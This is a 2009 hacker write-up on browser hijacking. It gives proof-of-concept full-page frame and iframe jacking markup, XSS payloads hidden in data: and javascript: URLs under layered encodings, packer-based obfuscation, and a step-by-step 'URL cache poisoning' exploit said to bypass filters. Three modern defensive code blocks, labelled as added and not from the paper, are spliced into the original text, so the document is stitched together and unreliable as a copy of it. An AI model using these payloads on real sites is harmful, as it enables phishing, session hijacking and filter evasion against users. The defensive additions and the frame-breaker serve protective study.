Browser Hijacking Techniques 2009
Written by p3lo, Sunday, 3 May 2009
Author: p3Lo (Thibaut.L)
Date: 05/2009
Target: All modern browsers (principally the URL address bar)
Tags: new XSS vector (remastered), redirects, frame jacking, JavaScript malware obfuscation,
packing, URL cache poisoning.
Site: http://attackvector.lescigales.org
Part 1
######
One might think that these techniques are obsolete or too old. Well, no!
Object-oriented programming languages are going to prove that this is wrong.
Indeed, a programming language like JavaScript can be awesome for an evil-minded attacker.
Let us move on to the explanation and the questions addressed:
- What can we do with frames / iframes, and with which constraints?
- What can we do maliciously with JavaScript?
- New obfuscation techniques, wtf?
- The iframe/frame way to pwn.
- One line to correct them all.
Lately I have worked on the development of new techniques; I'll present them in the course of this paper.
What can we do legally with frames / iframe, and with which constraints ?
########################################################################
-------
Frame :
-------
The contents of the frames may be hosted on the same server as the parent page,
or it may link in code from another website server such that these external contents
are automatically displayed within the frame (transclusion or remote loading).
This may be confusing and inconvenient to the users: they can get the impression
that the information belongs to the same website; also, less than the full browser
window is available and the address bar is less informative. Some websites request
not to be used in this way on other websites; some discourage it by including a framekiller
script in its pages. The framing website runs a risk of being blamed for external
content that, for example, is or becomes inaccurate or objectionable. In addition,
there may be legal issues associated with framing, in that the owner of the external
content may object to the involuntary (and possibly objectionable) implied association
with the framing website. Visitors may confuse ownership of copyrights or trademarks
of the external site with the owner of the framing site.
-------
Iframe:
-------
An inline frame places another HTML document in a frame inside a normal (rather than frameset)
HTML document. First introduced by Microsoft Internet Explorer in 1997 and long only available
in that browser, the iframe tag is now widely supported by visual browsers. Unlike an object
element, an inline frame may be the "target" frame for links defined in other elements and it
may be "selected" by a browser as the focus for printing, viewing HTML source etc. The <iframe>
tag must be closed by </iframe>. Content between the <iframe> tags is used as alternative text
to be displayed if the browser does not support iframes. The iframe element is invalid in Strict
DTDs, and in XHTML version 1.1. Inline frames have, at times, been exploited to illicitly inject
code into a web page. Standardised in HTML 4.0 (Frameset and Transitional DTDs only); still current.
src: http://en.wikipedia.org/wiki/Framing_(World_Wide_Web)
--------------------------------------
The hundred per-cent malicious thing :
--------------------------------------
Here comes the malicious part: why not put an iframe or a frame with the full page dimensions
in a simple HTML page? Let's do it!
Simple Frame Jacking Proof of Concept:
--------------------------------------
<frameset rows="100%">
<!-- wtf ?? frame jacking ? -->
<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http://foo.proxy">
<!-- its time to bypass filters -->
</frame>
</frameset>
Simple Iframe Jacking Proof of Concept :
----------------------------------------
<body TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<!--iframe isnt a fake site-->
<iframe src="http://foo.proxy" name="poc iframe jacking" width="100%" height="100%"
scrolling="auto" frameborder="no">
</iframe>
Now we know how to hide a website page with a frame or an iframe.
Consequently, the problems we are confronted with are:
- Can I reproduce an HTML iframe or frame with another programming language?
Yes, with JavaScript or Ajax for example, using a function that writes HTML (eval, document.write...).
- How to obfuscate it?
I can obfuscate my frame/iframe attack using JavaScript and different encodings (base64,
escaped, Unicode, ANSI, UTF-8...).
- Can I communicate between iframes?
Of course, with JavaScript rights on the framed/iframed page, respecting the same-origin policy a little.
- What time is it?
01:30. It's coffee time; don't hesitate to take a break, because the following lines are hardcoded.
Note: all latest-generation visual browsers support iframing or framing.
I have briefly answered all of these questions in this paragraph, and I'll develop them
further in the other parts of my paper.
What can we do maliciously with javascript ?
############################################
--------------------------------------
The Internet standards track protocol:
--------------------------------------
JavaScript is awesome; the majority of malicious ways to exploit it haven't been disclosed yet.
In fact, this paper will give birth to a new type of cross-site scripting attack: the browser-level XSS.
Browser-level XSS uses the Internet standards track protocol to execute arbitrary JavaScript
directly in the web browser, so the way of exploitation differs according to the browser.
But the javascript protocol is supported by all of them. If a browser-level XSS is executed directly
in the URL, ALL the XSS filters can be bypassed using differently encoded content.
On to the examples:
--------------
Data URL Scheme
---------------
data:[<mediatype>][;encoding],<data>
PoC Using the data protocol :
-----------------------------
Utf8 data url
data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e
Base64 data url
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTtoaXN0b3J5LmJhY2soKTs8L3NjcmlwdD4=
UTF7 data url
data:text/html;charset=utf-7,+ADw-script+AD4-alert(1)+ADs-history.back()+ADsAPA-/script+AD4-
UTF-16 in BASE64/UTF-7/UTF-8 mixture
data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPg+-alert(1);history.back()+ADs-</script>
UTF-16 in BASE64
data:text/html;charset=utf-7,+ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAxACkAOwBoAGkAcwB0AG8AcgB5A
C4AYgBhAGMAawAoACkAOwA8AC8AcwBjAHIAaQBwAHQAPg==+-
UTF-7 in BASE64
data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KDEpK0FEcy1oaXN0b3J5LmJhY2soKSt
BRHNBUEEtL3NjcmlwdCtBRDQt
obfuscated UTF-7 in BASE64
data:text/html;charset=utf-7;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KDEpK0FEcy1oaXN0b3J5LmJhY2soKSt
BRHNBUEEtL3NjcmlwdCtBRDQt
Image svg+xml in base64
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaH
R0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZX
JzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9In
RleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
All these data schemes (not my favourite) can lead to arbitrary code
(JavaScript / Ajax / HTML / Flash) execution. We can replace every previously
discovered XSS attack vector that uses src, href or another attribute with a data scheme.
For example:
<a href="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e">test</a>
<iframe src="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e"></iframe>
<script>document.location="data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e"</script>
etc...
So we can remaster every attack vector with encoded content.
But a small problem concerning browser compatibility persists.
That's why I prefer using the javascript protocol for my attack.
As we have seen, we can hide the URL bar with data-encoded content.
And we can encode the XSS vectors successively.
The javascript browser protocol looks like this:
------------------------------------------------
javascript:alert(1337)
Wtf?? It works on every browser.
New obfuscations techniques wtf ?
#################################
In the previous paragraph we showed that we can obfuscate JavaScript or HTML with the help
of browser encodings; now I will show you how to convert HTML to JavaScript with the help of
the JavaScript programming language and encoding.
First, just write HTML with JavaScript:
Frame jacking with simple html escape encoding:
-----------------------------------------------
<script type="text/javascript">document.write(unescape("%3Cframeset%20rows%3D%22100%25%22%3E%0A%3C%
21--%20wtf%20%3F%3F%20frame%20jacking%20%3F%20--%3E%0A%3Cframe%20noresize%3D%22noresize%22%20frameborder
%3D%220%22%20title%3D%22poc%20frame%20jacking%22%20src%3D%22http%3A%2F%2Ffoo.proxy%22%3E%0A%3C%21--%20its
%20time%20to%20bypass%20filters%20--%3E%0A%3C%2Fframe%3E%0A%3C%2Fframeset%3E"));</script>
Frame Jacking using write javascript function
---------------------------------------------
<script language="JavaScript" type="text/javascript">
<!--
function writeJS(){
var str='';
str+='<frameset rows="100%">';
str+='<!-- wtf ?? frame jacking ? -->';
str+='<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http:\/\/foo.proxy">';
str+='<!-- its time to bypass filters -->';
str+='<\/frame>';
str+='<\/frameset>';
document.write(str);
}
writeJS();
//-->
</script>
iFrame jacking with simple html escape encoding:
------------------------------------------------
<script type="text/javascript">document.write(unescape("%3Cbody%20TOPMARGIN%3D%220%22%20LEFTMARGIN%3D%220
%22%20MARGINWIDTH%3D%220%22%20MARGINHEIGHT%3D%220%22%3E%0A%3C%21--iframe%20isnt%20a%20fake%20site--%3E%0A
%3Ciframe%20src%3D%22http%3A%2F%2Ffoo.proxy%22%20%20name%3D%22poc%20iframe%20jacking%22%20%20width%3D%22100
%25%22%20height%3D%22100%25%22%20scrolling%3D%22auto%22%20frameborder%3D%22no%22%3E%3C%2Fiframe%3E"));</script>
iFrame Jacking using write javascript function:
-----------------------------------------------
<script language="JavaScript" type="text/javascript">
<!--
function writeJS(){
var str='';
str+='<body TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">';
str+='<!--iframe isnt a fake site-->';
str+='<iframe src="http:\/\/foo.proxy" name="poc iframe jacking" width="100%" height="100%" scrolling="auto" frameborder="no"><\/iframe>';
document.write(str);
}
writeJS();
//-->
</script>
Ajax asynchronous inline frame jacking:
---------------------------------------
<script>
function initialize() {
var testFrame = document.createElement("IFRAME");
testFrame.id = "testFrame";
testFrame.src = "http://foo.proxy";
testFrame.setAttribute("width","100%");
testFrame.setAttribute("height","100%");
testFrame.setAttribute("frameborder","no");
testFrame.setAttribute("scrolling","auto");
testFrame.style.display = "none";
document.body.appendChild(testFrame);
}
</script>
<body onload="initialize()" TOPMARGIN="0" LEFTMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
If we use the javascript or the data protocol, we can put all of this code in the URL address bar.
And of course we haven't yet seen the use of JavaScript encodings (just escape). At the time I
write this article there exist more than 20 encoding possibilities, and these encoding possibilities can be
combined to crypt/encode/pack your JavaScript content successively (infinitely), and all of them bypass
every browser security measure.
The only existing constraint is the length of the code: the longer the code, the slower it is to
execute. Furthermore, successive encoding using the javascript protocol can lead to new browser bugs
like URL cache poisoning. So as not to overload my paper with source code, I will use the frame jacking
PoC for my example (but the iframe PoC works too).
The iframe/frame way to pwn.
############################
-----------------------------------------------------------------
Step by step URL cache poisoning attacks (on remote or locally) :
-----------------------------------------------------------------
URL cache poisoning is a bug, caused by all the recent browsers, that I have discovered: when
a certain encoding/packing level is reached, the content of the address bar disappears and is replaced
by the last cached URL. The attack can be performed in the URL address bar, with a redirect or with an XSS.
Examples:
--------
For redirects:
Victim.foo/redirect.php?r=javascript:urlcachepoisoning
For XSS:
<script>document.location=document.write(urlcachepoisoning)</script>
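Both the redirect parameter above and the data:/javascript: links from the data URL section are stopped by the same control: parse the value and allow-list its scheme instead of filtering its content. The following JavaScript is an added example, not code from the paper; SITE_ORIGIN, the function names and the two benign sample URLs are assumptions.

```javascript
"use strict";
// Added example, not code from the paper. SITE_ORIGIN and the function
// names are assumptions made for the illustration.
const SITE_ORIGIN = "https://victim.example";
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// Content filter of the kind the paper bypasses: it looks for markup in the
// value and never asks which scheme the browser will dispatch on.
function naiveFilterAccepts(value) {
  return !/<\s*script|javascript:/i.test(value);
}

// Parse the value with the WHATWG URL parser (relative values are resolved
// against the site) and return the parsed URL only when its scheme is on
// the allow-list. data: and javascript: fail here no matter how the payload
// behind the colon is encoded.
function parseAllowedUrl(value) {
  let url;
  try {
    url = new URL(String(value), SITE_ORIGIN);
  } catch (_) {
    return null; // unparsable: reject rather than guess
  }
  return ALLOWED_PROTOCOLS.has(url.protocol) ? url : null;
}

// For href/src attributes: any http(s) destination is acceptable.
function isSafeLinkTarget(value) {
  return parseAllowedUrl(value) !== null;
}

// For a redirect parameter such as redirect.php?r=...: additionally require
// that the destination stays on this site, and fall back to "/" otherwise.
function safeRedirectTarget(value) {
  const url = parseAllowedUrl(value);
  if (url === null || url.origin !== SITE_ORIGIN) return "/";
  return url.pathname + url.search + url.hash;
}

// Three vectors quoted from the paper, then two benign values (constructed).
const SAMPLES = [
  "data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e",
  "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTtoaXN0b3J5LmJhY2soKTs8L3NjcmlwdD4=",
  "javascript:alert(1337)",
  "/account/home?tab=1",
  "https://partner.example/landing",
];

function report() {
  return SAMPLES.map((v) => ({
    value: v.slice(0, 40),
    naiveFilterAccepts: naiveFilterAccepts(v),
    safeLink: isSafeLinkTarget(v),
    redirectTo: safeRedirectTarget(v),
  }));
}

console.table(report());
```

The content filter lets both encoded data: URLs through, while the scheme check rejects them without decoding anything.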
Step1 use the frame jacking payload:
------------------------------------
<frameset rows="100%">
<!-- wtf ?? frame jacking ? -->
<frame noresize="noresize" frameborder="0" title="poc frame jacking" src="http://milw0rm.com/">
<!-- its time to bypass filters -->
</frame>
</frameset>
Step2 encode our frame jacking payload in html escape :
-------------------------------------------------------
document.write(unescape("%3Cframeset%20rows%3D%22100%25%22%3E%0A%3C%21--%20wtf%20%3F%3F%20frame%20jacking
%20%3F%20--%3E%0A%3Cframe%20noresize%3D%22noresize%22%20frameborder%3D%220%22%20title%3D%22poc%20frame%20
jacking%22%20src%3D%22http%3A%2F%2Fmilw0rm.com%2F%22%3E%0A%3C%21--%20its%20time%20to%20bypass%20filters%20
--%3E%0A%3C%2Fframe%3E%0A%3C%2Fframeset%3E%0A"));
Step3 we pack the escaped html with a javascript packer:
--------------------------------------------------------
<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?
String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('j.i(k("%l%m%3%h%g%2%1%0%5%7--%c%4%6%6%9%a%4%6%4
--%1%0%d%e%3%f%2%n%3%o%2%x%3%w%9%a%2%A%3%u%q%8%p.r%8%2%1%0%5%7--%B%t%s%y%b%4--%1%0%5%z%1%0%5%v%1%0"));
',38,38,'0A|3E|22|3D|20|3C|3F|21|2F|20frame|20jacking|20filters|20wtf|3Cframe|20noresize|22noresize|25
|22100|write|document|unescape|3Cframeset|20rows|20frameborder|220|2Fmilw0rm|3A|com|20to|20time|22http
|2Fframeset|22poc|20title|20bypass|2Fframe|20src|20its'.split('|'),0,{}))</script>
Step4 encode the packed javascript in unicode and test it in the url with javascript protocol :
-----------------------------------------------------------------------------------------------
The exploit is created, but other steps with multiple encodings and packing (fromCharCode) can be added
(infinitely) to make it harder for the victim to decrypt the attack. We understand that we can silently
and remotely redirect every XSSed or redirecting website. After this little demonstration, we can imagine
that the attacker can replace the framed URL with a phpproxy (which uses cURL and JavaScript) hosted on his
server in order to hijack the victim; I have already explained this technique in one of my papers.
http://milw0rm.com/papers/289
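Stacked encodings slow down manual analysis, but each layer used above is a reversible string transform that can be undone without executing anything. The following Node.js triage routine is an added example, not code from the paper; the pass cap, the indicator list, the abridged step-2 sample and the double-encoded sample (frame.example is a placeholder host) are assumptions.

```javascript
"use strict";
// Added example (Node.js), not code from the paper. Static triage only:
// every step is a string transform, nothing is passed to eval().

const MAX_PASSES = 10; // assumed cap so hostile input cannot force endless work

const hex = (_, h) => String.fromCharCode(parseInt(h, 16));

// One pass over the encodings the paper stacks: \uXXXX string escapes,
// %XX escapes (what unescape() reverses) and base64 data: URLs.
function peelOnce(s) {
  return s
    .replace(/\\u([0-9a-fA-F]{4})/g, hex)
    .replace(/%([0-9a-fA-F]{2})/g, hex)
    .replace(/data:[^,\s]*;base64,([A-Za-z0-9+\/=]+)/g,
      (_, b) => Buffer.from(b, "base64").toString("latin1"));
}

// What to look for once the text stops changing.
const INDICATORS = [
  ["frameset", /<frameset\b/i],
  ["frame", /<frame\b/i],
  ["iframe", /<iframe\b/i],
  ["script", /<script\b/i],
  ["packer", /eval\(function\(p,a,c,k,e,[dr]\)/], // packer stub seen in step 3
  ["document.write", /document\.write\s*\(/],
];

// Decode until a fixed point (or the cap), then report indicators and the
// destinations of any frame/iframe found.
function triage(input) {
  let text = String(input);
  let passes = 0;
  while (passes < MAX_PASSES) {
    const next = peelOnce(text);
    if (next === text) break;
    text = next;
    passes += 1;
  }
  const found = INDICATORS.filter(([, re]) => re.test(text)).map(([name]) => name);
  const frameSrc = Array.from(
    text.matchAll(/<i?frame\b[^>]*?\bsrc\s*=\s*["']?([^"'\s>]+)/gi),
    (m) => m[1]);
  return { passes, found, frameSrc, hitCap: passes === MAX_PASSES };
}

// Two vectors quoted from the paper, one abridged from its step 2, and one
// constructed double-encoded value.
const SAMPLES = {
  pctDataUrl: "data:text/html;charset=utf-8,%3cscript%3ealert(1);history.back();%3c/script%3e",
  b64DataUrl: "data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTtoaXN0b3J5LmJhY2soKTs8L3NjcmlwdD4=",
  escapedFrameset: 'document.write(unescape("%3Cframeset%20rows%3D%22100%25%22%3E' +
    '%3Cframe%20src%3D%22http%3A%2F%2Ffoo.proxy%22%3E%3C%2Fframeset%3E"));',
  doubleEncoded: "%253Ciframe%2520src%253D%2522http%253A%252F%252Fframe.example%252F%2522%253E",
};

for (const [name, value] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(triage(value)));
}
```

A result with `hitCap` set means the input was still changing when the cap was reached and should be treated as suspicious in its own right.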
One line to correct them all:
#############################
The frame breaker posted in my paper "from legal frame injection to illegal redirect" can be used to secure
the framed page; don't hesitate to put it on your login page to prevent possible future frame attacks on
your website.
if (top.frames.length!=0) top.location=self.document.location;
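The one-liner above only takes effect once script runs inside the framed page. As an added example (not from the paper), this JavaScript checks a response for the header-based controls that browsers enforce on a framed document, X-Frame-Options and the CSP frame-ancestors directive; the header object shape and the sample responses are assumptions.

```javascript
"use strict";
// Added example, not code from the paper. Header names are expected
// lower-cased in a plain object (assumption about the caller).

// Source list of the frame-ancestors directive in a CSP header value,
// or null when the directive is absent.
function frameAncestors(csp) {
  for (const directive of String(csp || "").split(";")) {
    const [name, ...sources] = directive.trim().split(/\s+/);
    if (name.toLowerCase() === "frame-ancestors") {
      return sources.map((s) => s.toLowerCase());
    }
  }
  return null;
}

// Can a page served with these headers be rendered inside a frame on
// another origin, as in the frame jacking PoC?
// blocked === true means no other origin is allowed to frame the page.
function framingVerdict(headers) {
  const sources = frameAncestors(headers["content-security-policy"]);
  if (sources !== null) {
    // When frame-ancestors is present, browsers that implement it apply it
    // and disregard X-Frame-Options.
    const external = sources.filter((s) => s !== "'self'" && s !== "'none'");
    return external.length === 0
      ? { blocked: true, reason: "csp frame-ancestors " + sources.join(" ") }
      : { blocked: false, reason: "csp frame-ancestors allows " + external.join(" ") };
  }
  const xfo = String(headers["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY" || xfo === "SAMEORIGIN") {
    return { blocked: true, reason: "x-frame-options " + xfo };
  }
  if (xfo.startsWith("ALLOW-FROM")) {
    // Obsolete value that current browsers ignore: treat as unprotected.
    return { blocked: false, reason: "x-frame-options ALLOW-FROM is obsolete" };
  }
  return {
    blocked: false,
    reason: xfo === "" ? "no anti-framing header" : "unrecognised x-frame-options value",
  };
}

// Constructed sample responses for a login page.
const RESPONSES = {
  bare: { "content-type": "text/html" },
  legacy: { "x-frame-options": "SAMEORIGIN" },
  modern: { "content-security-policy": "default-src 'self'; frame-ancestors 'none'" },
  partner: {
    "x-frame-options": "DENY",
    "content-security-policy": "frame-ancestors 'self' https://partner.example",
  },
  obsolete: { "x-frame-options": "ALLOW-FROM https://partner.example" },
};

function audit() {
  const out = {};
  for (const [name, headers] of Object.entries(RESPONSES)) {
    out[name] = framingVerdict(headers);
  }
  return out;
}

console.table(audit());
```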
I hope that you enjoyed reading my paper; I did it for fun, and just for the PoC.
Links concerning this article:
------------------------------
video browser hijacking techniques part1 by me
http://p3lo.blip.tv/file/2006110/
http://www.ietf.org/rfc/rfc2397.txt
http://www.gnucitizen.org/blog/frame-injection-fun/
http://h4k.in/dataurl/
http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database
Sorry for my bad English, I speak only one language: ethical hacking.
greetz:
-------
Str0ke . Mike001 .zulrigh. Devil . Noxo . MySt3ri0us . xxello . t0fx . AzOTe . Funny . Stiv0n
scarface-team .MrRabah. Xylitol . Z3Q3ul . asylu3 . 0ni . KPCR . Sh0ck . Nasty Shade . SylTroX
TheCrow . HuG . Hug88 . Ez3kiEl . tr00ps . Iectricdr3ke . stivon . Faworis .tryks . sh4ka
emuleman . RF . White Angels . Miss Narkotik . p@@@ . Akxos/Freiya . Odysse . EniGmATiquE
. Tavux . v00d00chile . mrabah12 . Big.E .SoLiTaIr3 . 0vernet . HiTMaX . Orion
50-1337 CreW . CWH Underground . TBH . Team Sakage . FRHACK
Yehouda,dimtokill,blueninja,nico,snoop,benbourr,trika,sakage team,ooyep,freeman